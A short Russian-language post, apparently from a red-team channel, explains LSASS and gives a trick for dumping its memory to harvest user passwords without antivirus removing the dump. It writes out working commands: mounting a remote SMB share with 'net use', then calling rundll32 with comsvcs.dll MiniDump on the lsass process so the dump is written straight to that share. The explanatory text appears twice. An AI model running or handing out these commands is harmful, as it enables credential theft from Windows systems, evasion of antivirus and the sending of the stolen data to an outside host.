💾 Удаленный дамп LSASS без записи на локальном диске
LSASS отвечает за проверку подлинности домена, управление активным каталогом и применение политик безопасности. Он генерирует процессы, отвечающие за аутентификацию пользователей с NTML, и проверяет достоверность имен входа.
А нужно это для того, чтобы каждый раз, когда вы открываете почту, ваши документы или приложения вас не спрашивали про ваш пароль. За вас это делает LSASS.
Дамп LSASS является распространённой red-team операцией, для получения паролей пользователей системы. Однако, дамп может быть удален сразу после его записи, так как это подозрительная активность.
С помощью этого трюка, антивирус не может удалить его, так как он не записан на локальном диске, а записан непосредственно на смонтированный общий ресурс:
#redteam #av
LSASS отвечает за проверку подлинности домена, управление активным каталогом и применение политик безопасности. Он генерирует процессы, отвечающие за аутентификацию пользователей с NTML, и проверяет достоверность имен входа.
А нужно это для того, чтобы каждый раз, когда вы открываете почту, ваши документы или приложения вас не спрашивали про ваш пароль. За вас это делает LSASS.
Дамп LSASS является распространённой red-team операцией, для получения паролей пользователей системы. Однако, дамп может быть удален сразу после его записи, так как это подозрительная активность.
С помощью этого трюка, антивирус не может удалить его, так как он не записан на локальном диске, а записан непосредственно на смонтированный общий ресурс:
net use x: \\ваш_smb_сервер\c$
powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full
#redteam #av